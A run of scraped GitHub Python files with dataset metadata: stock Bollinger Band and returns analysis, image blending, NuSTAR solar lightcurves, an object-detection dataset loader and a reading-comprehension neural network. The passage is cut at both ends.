SEEK_END)\n print(\"\\nWe are now at position %s after %s step(s) back-seeking in data.star\" %(file_position, steps))\n star.truncate()\n star.write(bytes(', ', 'ascii'))\n star.write(bytes('{:.0f}'.format(rd()*100), 'ascii'))\n star.write(bytes(']}', 'ascii'))\n\n# Inserting IEEE-754 data\nwith open('data.utf', 'rb+') as star:\n steps = 1\n file_position = star.seek(-steps, SEEK_END)\n print(\"\\nWe are now at position %s after %s step(s) back-seeking in data.utf\" %(file_position, steps))\n star.truncate()\n star.write(bytes(\", 'z':\", 'ascii'))\n D = f_dict['z'] # it's a list\n s = struct.pack('>' + 'd'*len(D), *D) # f:32bit, d:64bit each floating-number\n print(\"\\nwriting %s bytes into data.utf\" %len(s))\n star.write(b'\\x05' + s + b'\\x06')\n star.write(bytes(\"}\", 'ascii'))\n\nprint('After inserted d-64-array, data.utf: ', os.path.getsize('data.utf'), 'bytes (utf-8 encoding)\\n')\nfloatsize = os.path.getsize('data.utf') - datautfsize - len(\", 'z':\") - 2\nprint(\"Float size of data of length %s is thus %s\" %(len(D), floatsize))\n\n# *** Read-out the IEEE-754 data-array ***\ndatastring = ''\nwith open('data.utf','rb') as bin_file: #use rb to read as binary\n bin_file.seek(0)\n full_read = bin_file.read()\n float_start = full_read.find(b'\\x05') #ENQ (Enquiry)\n float_end = full_read.find(b'\\x06') #ACK (Acknowledge)\n print(\"\\nDouble-check the byte-size again:\")\n print(\"IEEE-data starts from location-%s\" %float_start)\n print(\"and it ends at location-%s\\n\" %float_end)\n bin_file.seek(0)\n bin_read = bin_file.read(float_start)\n datastring += 
bin_read.decode('utf-8')\n bin_file.seek(float_start+1) #skip floating-marker-byte \\x07 (start)\n z_read = bin_file.read(float_end-float_start-1)\n print(\"The length of the floating-points: %s\" %((float_end-float_start-1)//8))\n unfloat = struct.unpack('>' + 'd'*((float_end-float_start-1)//8), z_read) #unpacking IEEE-754 encoded float-points\n datastring += str(list(unfloat))\n bin_file.seek(float_end+1) #skip floating-marker-byte \\x08 (end)\n bin_read = bin_file.read()\n datastring += bin_read.decode('utf-8')\n # print(\"data-string:\\n %s\" %datastring)\n\n# Reconstructing byte-data into dictionary\ndata_reconstructed = ast.literal_eval(datastring)\nprint('data.utf: David:', data_reconstructed['David'])\nans = data_reconstructed['David'][0] + data_reconstructed['David'][6]\nprint('1 + 7 = ', ans)\nprint('data.utf: a list:', data_reconstructed['a list'])\nprint('data.utf: z[:12]:', data_reconstructed['z'][:12])\nprint('data.utf: z[2]+z[-1]: %s' %(data_reconstructed['z'][2] + data_reconstructed['z'][-1]))\nprint('data.utf: x:', data_reconstructed['x'])\nprint('data.utf: y:', data_reconstructed['y'])\n\n# including f_dict of floating-list as char-list\ndata.update(f_dict)\ndatas = str(data)\n# print(\"\\nSerialized Data (Length: %s): %s\" %(len(datas), datas))\nwith open('data.utfc', 'wb') as utfile:\n utfile.write(datas.encode('utf-8'))\nprint('\\nAfter inserting f_dict as char-list, data.utfc: ', os.path.getsize('data.utfc'), 'bytes (utf-8 encoding)')\nprint('whose size is way larger if we have huge list of numbers!\\n')\n","repo_name":"takehuge/Notes","sub_path":"LoaData.py","file_name":"LoaData.py","file_ext":"py","file_size_in_byte":7971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14698775298","text":"# Statistical analysis of time series\n# https://classroom.udacity.com/courses/ud501/lessons/4156938722/concepts/45439393860923\n\n\"\"\"\nGlobal statistics:\n mean: http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.mean.html\n median: http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.median.html\n std: http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.std.html\n sum: http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.sum.html\n [more]: http://pandas.pydata.org/pandas-docs/stable/api.html#api-dataframe-stats\n\nRolling statistics:\n rolling_mean: http://pandas.pydata.org/pandas-docs/stable/generated/pandas.rolling_mean.html (Deprecated)\n rolling_std: http://pandas.pydata.org/pandas-docs/stable/generated/pandas.rolling_std.html (Deprecated)\n [more]:http://pandas.pydata.org/pandas-docs/stable/computation.html?highlight=rolling%20statistics#moving-rolling-statistics-moments\n Updated function example: https://stackoverflow.com/questions/50313698/pandas-rolling-mean-not-working\n\nDocument on how to import functions from other files in python (and nice explanation on objects OOP):\n https://www.csee.umbc.edu/courses/331/fall10/notes/python/python3.ppt.pdf\n\n Pycon 2010 webpage: http://us.pycon.org/2010/conference/schedule/event/50/\n\"\"\"\n\"\"\"Bollinger Bands.\"\"\"\n\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef symbol_to_path(symbol, base_dir=\"C:\\\\Users\\\\aroom\\\\Documents\\\\Data\\\\tickers_data\\\\\"):\n \"\"\"Return CSV file path given ticker symbol.\"\"\"\n return os.path.join(base_dir, \"{}.csv\".format(str(symbol)))\n\n\ndef get_data(symbols, dates):\n \"\"\"Read stock data (adjusted close) for 
given symbols from CSV files.\"\"\"\n df = pd.DataFrame(index=dates)\n if 'SPY' not in symbols: # add SPY for reference, if absent\n symbols.insert(0, 'SPY')\n\n for symbol in symbols:\n df_temp = pd.read_csv(symbol_to_path(symbol), index_col='Date',\n parse_dates=True, usecols=['Date', 'Adj Close'], na_values=['nan'])\n df_temp = df_temp.rename(columns={'Adj Close': symbol})\n df = df.join(df_temp)\n if symbol == 'SPY': # drop dates SPY did not trade\n df = df.dropna(subset=[\"SPY\"])\n\n return df\n\n\ndef plot_data(df, title=\"Stock prices\", xlabel=\"Date\", ylabel=\"Price\"):\n \"\"\"Plot stock prices with a custom title and meaningful axis labels.\"\"\"\n ax = df.plot(title=title, fontsize=12)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n plt.show()\n return\n\n\ndef get_rolling_mean(values, window):\n \"\"\"Return rolling mean of given values, using specified window size.\"\"\"\n return values.rolling(window=window, center=False).mean()\n\n\ndef get_rolling_std(values, window):\n \"\"\"Return rolling standard deviation of given values, using specified window size.\"\"\"\n # DONE: Compute and return rolling standard deviation\n return values.rolling(window=window, center=False).std()\n\n\ndef get_bollinger_bands(rm, rstd):\n \"\"\"Return upper and lower Bollinger Bands.\"\"\"\n # DONE: Compute upper_band and lower_band\n upper_band = rm + 2 * rstd\n lower_band = rm - 2 * rstd\n return upper_band, lower_band\n\n\ndef compute_daily_returns(df):\n \"\"\"Compute and return the daily return values.\"\"\"\n # http://us.pycon.org/2010/conference/schedule/event/50/\n # DONE: Your code here\n # Note: Returned DataFrame must have the same number of rows\n df_tmp = df.pct_change()\n df_tmp.iloc[0, :] = 0\n return df_tmp\n\n\ndef compute_cumulative_returns(df):\n \"\"\"Compute and return the daily return values.\"\"\"\n # http://us.pycon.org/2010/conference/schedule/event/50/\n # DONE: Your code here\n # Note: Returned DataFrame must have the same number of rows\n # Solution taken from https://stackoverflow.com/questions/40811246/pandas-cumulative-return-function\n # df.ix[\"Cumulative\"] = ((df.fillna(0) + 1).cumprod() - 1).iloc[-1] # This gives only one value per column, is not a column of Cumulative returns\n # df_tmp.iloc[0, :] = 0\n # Solution taken from https://stackoverflow.com/questions/40204396/plot-cumulative-returns-of-a-pandas-dataframe\n df_tmp = ((df + 1).cumprod() - 1)\n return df_tmp\n\n\ndef test_run():\n # Read data\n dates = pd.date_range('2012-01-01', '2012-12-31')\n symbols = ['SPY']\n df = get_data(symbols, dates)\n\n #######################################################################\n # Compute Bollinger Bands\n #######################################################################\n # 1. Compute rolling mean\n rm_SPY = get_rolling_mean(df['SPY'], window=20)\n\n # 2. Compute rolling standard deviation\n rstd_SPY = get_rolling_std(df['SPY'], window=20)\n\n # 3. 
Compute upper and lower bands\n upper_band, lower_band = get_bollinger_bands(rm_SPY, rstd_SPY)\n\n # Plot raw SPY values, rolling mean and Bollinger Bands\n ax = df['SPY'].plot(title=\"Bollinger Bands\", label='SPY')\n rm_SPY.plot(label='Rolling mean', ax=ax)\n upper_band.plot(label='upper band', ax=ax)\n lower_band.plot(label='lower band', ax=ax)\n\n # Add axis labels and legend\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Price\")\n ax.legend(loc='upper left')\n plt.show()\n\n #######################################################################\n # Compute daily returns\n #######################################################################\n # Read data\n dates = pd.date_range('2012-07-01', '2012-07-31') # one month only\n symbols = ['SPY', 'XOM']\n df = get_data(symbols, dates)\n plot_data(df)\n\n # Compute daily returns\n daily_returns = compute_daily_returns(df)\n plot_data(daily_returns, title=\"Daily returns\", ylabel=\"Daily returns\")\n\n #######################################################################\n # Compute cumulative returns\n #######################################################################\n # Read data\n dates = pd.date_range('2012-01-01', '2012-12-31') # whole 2012\n symbols = ['SPY']\n df = get_data(symbols, dates)\n plot_data(df)\n\n # Compute daily returns\n daily_returns = compute_daily_returns(df)\n\n # Compute cumulative returns\n cum_returns = compute_cumulative_returns(daily_returns)\n plot_data(cum_returns, title=\"Cumulative returns\", ylabel=\"Cumulative returns\")\n\n\nif __name__ == \"__main__\":\n test_run()\n","repo_name":"xiaxio/UdacityMachineLearningForTrading","sub_path":"Lesson_05.py","file_name":"Lesson_05.py","file_ext":"py","file_size_in_byte":6387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"18720648099","text":"\nclass formatResponse():\n\n @staticmethod\n def single(descriptions, data):\n response = {}\n columns = [col[0] for col in descriptions]\n for key in range(len(columns)):\n response[columns[key]] = data[key]\n return response\n \n @staticmethod\n def multiple(descriptions, data):\n response = {}\n responseArray = []\n columns = [col[0] for col in descriptions]\n for item in range(len(data)):\n for key in range(len(columns)):\n response[columns[key]] = data[item][key]\n responseArray.append(response)\n return responseArray\n","repo_name":"Oluwasegun-AA/pipit","sub_path":"flask/app/helpers/formatResponse.py","file_name":"formatResponse.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"30394868942","text":"import os\n\nimport numpy as np\nimport torch\nfrom PIL import Image\nfrom sklearn.preprocessing import LabelEncoder\nfrom torch.utils.data import Dataset\n\nfrom Meta import MetaName, MetaLabel, MetaBBox\nfrom models.defects.utils import box2imgsize_box, transform\n\n\nclass GetterBase(Dataset):\n def __init__(self, keep_difficult=False):\n \"\"\"\n :param data_folder: folder where data files are stored\n :param keep_difficult: keep or discard objects that are considered difficult to detect?\n \"\"\"\n\n self.keep_difficult = keep_difficult\n\n def __getitem__(self, i):\n # Read image\n image = Image.open(self.images[i], mode='r')\n image = image.convert('RGB')\n\n # Read objects in this image (bounding boxes, labels, difficulties)\n objects = self.objects[i]\n boxes = torch.FloatTensor(objects['boxes']) # (n_objects, 4)\n labels = 
torch.tensor(objects['labels']) # (n_objects)\n difficulties = torch.ByteTensor(objects['difficulties']) # (n_objects)\n\n # Apply transformations\n image, boxes, labels, difficulties = transform(image, boxes, labels, difficulties, split=self.split)\n meta_labels = MetaLabel(labels=labels.detach().numpy(), confidence=np.array([1] * labels.shape[0]))\n meta_boxes = MetaBBox(points=boxes, label_info=meta_labels)\n\n return {'image': image, MetaName.META_BBOX.value: meta_boxes}\n\n def __len__(self):\n return len(self.images)\n\n def collate_fn(self, batch):\n \"\"\"\n Since each image may have a different number of objects, we need a collate function (to be passed to the DataLoader).\n\n This describes how to combine these tensors of different sizes. We use lists.\n\n Note: this need not be defined in this Class, can be standalone.\n\n :param batch: an iterable of N sets from __getitem__()\n :return: a tensor of images, lists of varying-size tensors of bounding boxes, labels, and difficulties\n \"\"\"\n\n images = list()\n boxes = list()\n labels = list()\n difficulties = list()\n\n for b in batch:\n images.append(b[0])\n boxes.append(b[1])\n labels.append(b[2])\n difficulties.append(b[3])\n\n images = torch.stack(images, dim=0)\n\n return images, boxes, labels, difficulties\n\n\nclass DefectsModelDataset(GetterBase):\n\n def __init__(self, data_folder, split, anno_postfix: str, img_postfix: str, keep_difficult=False,\n label_aux: int = 0):\n super().__init__(data_folder)\n\n self.split = split.upper()\n self.anno_postfix = anno_postfix\n self.img_postfix = img_postfix\n assert self.split in {'TRAIN', 'TEST', 'VALID', 'TEMPLATES'}\n self.label_aux = label_aux\n\n self.data_folder = data_folder\n self.keep_difficult = keep_difficult\n\n self.le = LabelEncoder()\n self.get_classes(data_folder)\n self.objects, self.anno_list = self.get_objects(data_folder)\n self.images = self.get_images()\n\n assert len(self.images) == len(self.objects)\n\n def get_images(self):\n images = list()\n for anno in self.anno_list:\n img_path = self.__anno2img_path(anno)\n if os.path.exists(img_path):\n images.append(img_path)\n return images\n\n def get_classes(self, path: str):\n anno_path = os.path.join(path, 'bboxes')\n annos = os.listdir(anno_path)\n labels = list()\n for anno in annos:\n full_anno_path = os.path.join(anno_path, anno)\n img_path = self.__anno2img_path(full_anno_path)\n if not os.path.exists(img_path):\n continue\n with open(full_anno_path, 'r') as f:\n\n for line in f.readlines():\n info = line.strip().split()\n labels.append(info[0])\n self.le.fit(labels)\n\n def get_objects(self, path: str):\n anno_path = os.path.join(path, 'bboxes')\n annos = os.listdir(anno_path)\n objects = list()\n annos_list = list()\n for anno in annos:\n full_anno_path = os.path.join(anno_path, anno)\n img_path = self.__anno2img_path(full_anno_path)\n if not os.path.exists(img_path):\n continue\n with open(full_anno_path, 'r') as f:\n boxes = list()\n labels = list()\n difficulties = list()\n\n for line in f.readlines():\n info = line.strip().split()\n box = [float(box.replace(',', '.')) for box in info[1:]]\n box = box2imgsize_box(img_path, box)\n boxes.append(box)\n labels.append(info[0])\n difficulties.append(0)\n if len(boxes) != 0:\n labels = np.array(self.le.transform(labels))\n labels = (labels + self.label_aux).tolist()\n objects.append({'boxes': boxes, 'labels': labels, 'difficulties': difficulties})\n annos_list.append(full_anno_path)\n\n return objects, annos_list\n\n def __anno2img_path(self, anno_path: 
str) -> str:\n return anno_path.replace(self.anno_postfix, self.img_postfix).replace('bboxes', self.split)\n","repo_name":"MLFreelib/cvflow","sub_path":"models/defects/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5334,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"39376743975","text":"\"\"\"\nThe FriendBlend pipeline\n\"\"\"\n\nimport logging\nimport sys\nfrom concurrent.futures import ThreadPoolExecutor\nfrom multiprocessing.pool import Pool\nimport os\n\nimport cv2 as cv\nimport numpy as np\nfrom rich.logging import RichHandler\n\nfrom friendblend.processing.alpha_blending import alpha_blend\nfrom friendblend.processing.color_correction import apply_clahe\nfrom friendblend.processing.face_body_detection import get_bounds\nfrom friendblend.processing.grab_cut import grab_cut\nfrom friendblend.processing.keypoint import ORB, filter_keypoints, find_homography\nfrom friendblend.processing import helpers as processing_helpers\nfrom friendblend.helpers import log_all_methods, log_all_in_module\nfrom friendblend import global_vars\n\nimport friendblend\n\nlog_all_in_module(friendblend.processing.color_correction)\nlog_all_in_module(friendblend.processing.face_body_detection)\nlog_all_in_module(friendblend.processing.keypoint)\nlog_all_in_module(friendblend.processing.alpha_blending)\nlog_all_in_module(friendblend.processing.grab_cut)\n\n\ndef _process_blend(img):\n \"\"\"\n only functions at module level are pickle-able\n multiprocessing involves pickling stuff so this had to be a top-level function\n \"\"\"\n return Blend._process_blend(img)\n\n\n@log_all_methods()\nclass Blend:\n \"\"\"\n Blend two images with friends into one\n \"\"\"\n\n def __init__(self, img1_path: str, img2_path: str):\n self.log = logging.getLogger()\n self.img1 = Blend.resize(self.imload(img1_path, ensure_success=True), 900, None)\n self.img2 = Blend.resize(\n self.imload(img2_path, ensure_success=True), 900, self.img1.shape[0]\n )\n self.intermediate_imgs = []\n\n def imload(\n self, img_path, mode: int = 1, ensure_success: bool = False\n ) -> np.ndarray:\n \"\"\"\n Loads an image\n Dies if ensure_success is true and image read error occurs\n \"\"\"\n im = cv.imread(img_path, mode)\n\n if im is None:\n self.log.error(\"Couldn't load image at '%s'\", img_path)\n\n if ensure_success:\n self.log.error(\"ensure_success set, dying\")\n sys.exit(1)\n\n return im\n\n @staticmethod\n def resize(img: np.ndarray, w: int, h: int) -> np.ndarray:\n \"\"\"\n Resizes image to (w, h)\n \"\"\"\n if h is None and w is None:\n return img\n\n if h is None:\n r = img.shape[1] / w\n h = img.shape[0] / r\n elif w is None:\n r = img.shape[0] / h\n w = img.shape[1] / r\n\n return cv.resize(img, (int(w), int(h)), interpolation=cv.INTER_CUBIC)\n\n @staticmethod\n def color_correction(img, clip_limit=3.0, n_bins=256, grid=(7, 7)):\n \"\"\"\n Color correction using CLAHE\n \"\"\"\n\n return apply_clahe(img, clip_limit=clip_limit, n_bins=n_bins, grid=grid)\n\n @staticmethod\n def get_face_body_bounds(img):\n \"\"\"\n Calculates face and body bounds\n \"\"\"\n return get_bounds(img)\n\n @staticmethod\n def get_homography(img1, img2, bb1, bb2):\n \"\"\"\n Calculates and filters ORB descriptors\n \"\"\"\n\n def _get_orb_features(img, bb1, bb2):\n \"\"\"\n Returns filtered ORB keypoints and descriptors\n \"\"\"\n orb = ORB(img)\n kps = orb.get_keypoints()\n filtered_kps = filter_keypoints(bb1, bb2, kps)\n ds = orb.get_descriptors(filtered_kps)\n\n return 
filtered_kps, ds\n\n with ThreadPoolExecutor() as executor:\n t1 = executor.submit(_get_orb_features, img1, bb1, bb2)\n t2 = executor.submit(_get_orb_features, img2, bb1, bb2)\n\n kps1, ds1 = t1.result()\n kps2, ds2 = t2.result()\n\n H, matched_img = find_homography(kps1, ds1, kps2, ds2, img1, img2)\n\n return H, matched_img\n\n @staticmethod\n def _process_blend(img):\n \"\"\"\n 1. color corrects image\n 2. extracts face and body bounding boxes\n\n Returns\n - color corrected image\n - face and\n - body bounds an image with the bounds drawn\n \"\"\"\n # color correct images\n color_corrected = Blend.color_correction(img)\n\n # get face and body bounds\n face_bounds, body_bounds = Blend.get_face_body_bounds(color_corrected)\n\n illustrated_bounds = processing_helpers.draw_box(color_corrected, face_bounds)\n illustrated_bounds = processing_helpers.draw_box(\n illustrated_bounds, body_bounds\n )\n\n return color_corrected, face_bounds, body_bounds, illustrated_bounds\n\n def order_images(self, img1, img2, fb1, fb2, bb1, bb2, boxed1, boxed2):\n \"\"\"\n Orders images and related variables such that the first image has face on the left\n \"\"\"\n # initial guess\n imgs = [img1, img2]\n fbs = [fb1, fb2]\n bbs = [bb1, bb2]\n boxeds = [boxed1, boxed2]\n\n if bb1[0] > bb2[0]:\n self.img2, self.img1 = self.img1, self.img2\n self.log.info(\"Swapping image order\")\n imgs.reverse()\n fbs.reverse()\n bbs.reverse()\n boxeds.reverse()\n\n return (*imgs, *fbs, *bbs, *boxeds)\n\n @staticmethod\n def get_alpha_blend(img_l, img_r, bb_l, bb_r):\n \"\"\"\n blends the images using alpha blending\n \"\"\"\n return alpha_blend(img_l, img_r, bb_l, bb_r)\n\n @staticmethod\n def get_grabcut_order(img1, img2, fb1, fb2, bb1, bb2):\n \"\"\"\n orders the images such that\n \"\"\"\n # initial guess\n img_l, img_r = img1, img2\n bb_l, bb_r = bb1, bb2\n fb_l, fb_r = fb1, fb2\n\n # Compare size of face bounding boxes\n if fb1[2] * fb1[3] < fb2[2] * fb2[3]:\n img_l, img_r = img2, img1\n bb_l, bb_r = bb2, bb1\n fb_l, fb_r = fb2, fb1\n\n # returns image with larger face bounding box as first image\n return img_l, img_r, fb_l, fb_r, bb_l, bb_r\n\n @staticmethod\n def get_grabcut(img_l, img_r, fb_l):\n return grab_cut(img_l, img_r, fb_l)\n\n def blend(self):\n \"\"\"\n Performs the FriendBlend algorithm\n \"\"\"\n p = Pool(2)\n r1, r2 = p.map(_process_blend, [self.img1, self.img2])\n\n cc1, fb1, bb1, boxed1 = r1\n cc2, fb2, bb2, boxed2 = r2\n\n cc1, cc2, fb1, fb2, bb1, bb2, boxed1, boxed2 = self.order_images(\n cc1, cc2, fb1, fb2, bb1, bb2, boxed1, boxed2\n )\n\n self.intermediate_imgs.extend([cc1, cc2, boxed1, boxed2])\n\n # compute homography (uses ORB)\n H, matched_img = Blend.get_homography(cc1, cc2, bb1, bb2)\n\n self.intermediate_imgs.append(matched_img)\n\n warp_img = cv.warpPerspective(cc1, H, cc1.shape[:2][::-1])\n\n self.intermediate_imgs.append(warp_img)\n\n if bb2[0] - (bb1[0] + bb1[2]) > 100:\n self.log.info(\"Using Alpha Blending to merge the images\")\n blended = Blend.get_alpha_blend(warp_img, cc2, bb1, bb2)\n\n try:\n # :(\n os.remove(\"../images/outputs/6-grabcut.png\")\n except:\n pass\n\n else:\n self.log.info(\"Using GrabCut to merge the images\")\n img_l, img_r, bb_l, bb_r, fb_l, fb_r = Blend.get_grabcut_order(\n warp_img, cc2, bb1, bb2, fb1, fb2\n )\n grabcut_img, blended = Blend.get_grabcut(img_l, img_r, fb_l)\n\n self.intermediate_imgs.append(grabcut_img)\n\n file_names = [\n \"cc1.png\",\n \"cc2.png\",\n \"bb1.png\",\n \"bb2.png\",\n \"keypoints.png\",\n \"warped.png\",\n \"grabcut.png\",\n ]\n\n for i 
in range(len(self.intermediate_imgs)):\n cv.imwrite(\n \"../images/outputs/\" + str(i) + \"-\" + file_names[i],\n self.intermediate_imgs[i],\n )\n\n return blended, self.intermediate_imgs\n\n\nglobal_vars.initialize()\nif __name__ == \"__main__\":\n logging.basicConfig(\n level=logging.DEBUG,\n format=\"%(message)s\",\n handlers=[RichHandler(rich_tracebacks=True, show_time=False, show_path=False)],\n )\n log = logging.getLogger()\n\n if len(sys.argv) != 3:\n log.warning(\n \"Please provide name of the images. (inside `images` directory at repo root).\"\n \" Using default images as fallback for demonstration\"\n )\n\n img1_path = \"../images/chaarminar/chaarminar-5.jpg\"\n img2_path = \"../images/chaarminar/chaarminar-3.jpg\"\n else:\n img1_path = f\"../images/{sys.argv[1]}\"\n img2_path = f\"../images/{sys.argv[2]}\"\n\n blend, _ = Blend(img1_path, img2_path).blend()\n cv.imwrite(\"../images/outputs/final-blended.png\", blend)\n","repo_name":"yoogottamk/Intelligent-Image-Composition","sub_path":"src/friendblend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8784,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"7796975048","text":"# Make lightcurve of NuSTAR evt solar data, both FPMA and FPMB \n# and return pandas dataframe (optionally can save to csv as well)\n# \n# Only does any other filtering (xy, det_id) if engery filtering\n# \n# If det_id is given then xy_range is ignored\n# \n# If no outfile given then no .csv file created\n# \n# Default return livetime and rates, lvt=False will return/save rate only\n# \n# In theory could do using astropy.table.Table with\n# from astropy.table import Table\n# t=Table.read(maindir+nsid+'/hk/nu'+nsid+fpm+'_fpm.hk',hdu=1).to_pandas()\n# but doesn't load header info so can't convert the time, so have to do more manual fit.open() \n# \n# 24-Sep-2022 IGH\n# -----------------------------------\n\nfrom astropy.io import fits\nimport astropy.time as atime\nimport astropy.units as u\n\nimport numpy as np\n\nimport nustar_pysolar as nustar\nimport pandas as pd\n\nimport warnings\nwarnings.simplefilter('ignore')\n\n# ------------------------------------------\n# Do livetime and rate per FPM\ndef nsrate_df(maindir='',nsid='',clid='',outfile='',\\\n englow=0,enghigh=0,xy_range=[],det_id='',lvt=True):\n\n fpm='A'\n hdulist = fits.open(maindir+nsid+'/event_cl/nu'+nsid+fpm+clid+'.evt')\n evda=hdulist[1].data\n hdra = hdulist[1].header\n hdulist.close()\n\n hdulist = fits.open(maindir+nsid+'/hk/nu'+nsid+fpm+'_fpm.hk')\n lda=hdulist[1].data\n lhdra = hdulist[1].header\n hdulist.close()\n\n fpm='B'\n hdulist = fits.open(maindir+nsid+'/event_cl/nu'+nsid+fpm+clid+'.evt')\n evdb=hdulist[1].data\n hdrb = hdulist[1].header\n hdulist.close()\n\n hdulist = fits.open(maindir+nsid+'/hk/nu'+nsid+fpm+'_fpm.hk')\n ldb=hdulist[1].data\n lhdrb = hdulist[1].header\n hdulist.close()\n\n # Sort out the time index of the livetimes\n mjdref=atime.Time(hdra['mjdrefi'],format='mjd')\n ltimsa=atime.Time(mjdref+lda['time']*u.s,format='mjd')\n ltimsb=atime.Time(mjdref+ldb['time']*u.s,format='mjd')\n\n # If not englow or enghigh specified don't filter the evt\n if (englow!=0) and (enghigh!=0):\n if (len(xy_range)==4):\n evda=nustar.filter.event_filter(evda,fpm='A',energy_low=englow, energy_high=enghigh,hdr=hdra,xy_range=xy_range)\n evdb=nustar.filter.event_filter(evdb,fpm='B',energy_low=englow, energy_high=enghigh,hdr=hdrb,xy_range=xy_range)\n else:\n if (det_id != ''):\n 
evda=nustar.filter.event_filter(evda,fpm='A',energy_low=englow, energy_high=enghigh,hdr=hdra,dets_id=det_id)\n evdb=nustar.filter.event_filter(evdb,fpm='B',energy_low=englow, energy_high=enghigh,hdr=hdrb,dets_id=det_id)\n else:\n evda=nustar.filter.event_filter(evda,fpm='A',energy_low=englow, energy_high=enghigh)\n evdb=nustar.filter.event_filter(evdb,fpm='B',energy_low=englow, energy_high=enghigh)\n\n\n timsa=atime.Time(mjdref+evda['time']*u.s,format='mjd')\n timsb=atime.Time(mjdref+evdb['time']*u.s,format='mjd')\n\n # Use the 1sec time binning of the livetime for the binning of the counts\n tda=(timsa-ltimsa[0]).sec\n tdb=(timsb-ltimsb[0]).sec\n\n # Time bin edges should be same for A and B\n tdedgs=(ltimsa-ltimsa[0]).sec\n\n # hisotgram number of events per the livetime 1s bins\n cnta, bea=np.histogram(tda,bins=tdedgs)\n cntb, beb=np.histogram(tdb,bins=tdedgs)\n rta=cnta/lda['LIVETIME'][:-1]\n rtb=cntb/ldb['LIVETIME'][:-1]\n\n # turn it into a pandas dataframe\n if lvt:\n dfl=pd.DataFrame(np.array([lda['LIVETIME'][:-1],ldb['LIVETIME'][:-1],rta,rtb]).T, \\\n index=ltimsa.datetime[:-1], columns=['lvta','lvtb','rta','rtb'])\n else:\n dfl=pd.DataFrame(np.array([rta,rtb]).T, \\\n index=ltimsa.datetime[:-1], columns=['rta','rtb'])\n\n # truncate to time range of the evt file\n # Start/End round up/down to nearest 1s\n mint=atime.Time(min(timsa[0].isot,timsb[0].isot),format='isot',precision=0) + 1*u.s\n maxt=atime.Time(max(timsa[-1].isot,timsb[-1].isot),format='isot',precision=0) - 1*u.s\n dflt=dfl.truncate(mint.isot,maxt.isot)\n\n # save out\n if outfile != '':\n dflt.to_csv(outfile)\n \n return dflt","repo_name":"ianan/nustar_sac","sub_path":"python/nsltc_df.py","file_name":"nsltc_df.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"40886813004","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torch import cuda\n\nfrom modules import *\n\n\nclass Embed(nn.Module):\n def __init__(self, vocab_size, embed_dim):\n super(Embed, self).__init__()\n self.embed_dim = embed_dim\n self.embed = nn.Embedding(vocab_size, self.embed_dim)\n\n def forward(self, doc, qry):\n doc = self.embed(doc)\n qry = self.embed(qry)\n\n return doc, qry\n\n\nclass Encoder(nn.Module):\n def __init__(self, embed_dim, hidden_dim, num_layers, bidirectional):\n super(Encoder, self).__init__()\n self.embed_dim = embed_dim\n self.hidden_dim = hidden_dim\n self.bidirectional = bidirectional\n self.num_layers = num_layers\n\n self.gru = nn.GRU(self.embed_dim, self.hidden_dim, batch_first=True, num_layers=num_layers,\n bidirectional=bidirectional)\n\n def forward(self, doc, qry, doc_h0, qry_h0):\n batch_size = doc.size(0)\n\n qry_h, _ = self.gru(qry, qry_h0)\n doc_h, _ = self.gru(doc, doc_h0)\n\n return doc_h, qry_h\n\n def init_hidden(self, batch_size, bidirectional=False):\n hidden = next(self.parameters()).data\n if bidirectional == False:\n return Variable(hidden.new(self.num_layers, batch_size, self.hidden_dim).zero_())\n else:\n return Variable(hidden.new(self.num_layers * 2, batch_size, self.hidden_dim).zero_())\n\n\nclass MatchLSTM(nn.Module):\n def __init__(self, hidden_dim, cuda=True):\n super(MatchLSTM, self).__init__()\n self.hidden_dim = hidden_dim\n self.cuda = cuda\n\n self.initprev = InitPrev(self.hidden_dim)\n self.attn = AttnLayer(self.hidden_dim)\n self.lstm_stack = nn.ModuleList([MatchCell(self.hidden_dim) for _ in 
range(2)])\n self.linear = nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2)\n\n def forward(self, doc_h, qry_h, dm, qm):\n \"\"\"\n doc_h: B x D x 2*H // qry_h: B x Q x 2*H\n dm: B x D // qm: B x Q\n \"\"\"\n batch_size = doc_h.size(0)\n doc_len = doc_h.size(1)\n\n if self.cuda:\n hr_r = Variable(torch.zeros(batch_size, doc_len, self.hidden_dim * 2)).cuda()\n hr_l = Variable(torch.zeros(batch_size, doc_len, self.hidden_dim * 2)).cuda()\n else:\n hr_r = Variable(torch.zeros(batch_size, doc_len, self.hidden_dim * 2))\n hr_l = Variable(torch.zeros(batch_size, doc_len, self.hidden_dim * 2))\n\n for i in range(doc_len):\n if i == 0:\n prev_hr = self.initprev(qry_h, qm) # B x 2*H\n\n alpha = self.attn(doc_h[:, i, :], qry_h, prev_hr, qm) # B x Q x 1\n prev_hr = self.lstm_stack[0](doc_h[:, i, :], qry_h, prev_hr, alpha) # B x 2*H\n hr_r[:, i, :] = prev_hr.unsqueeze(1) # B x 1 x 2*H\n\n for i in reversed(range(doc_len)):\n if i == doc_len - 1:\n prev_hr = self.initprev(qry_h, qm)\n\n alpha = self.attn(doc_h[:, i, :], qry_h, prev_hr, qm)\n prev_hr = self.lstm_stack[1](doc_h[:, i, :], qry_h, prev_hr, alpha)\n hr_l[:, i, :] = prev_hr.unsqueeze(1)\n\n hr = 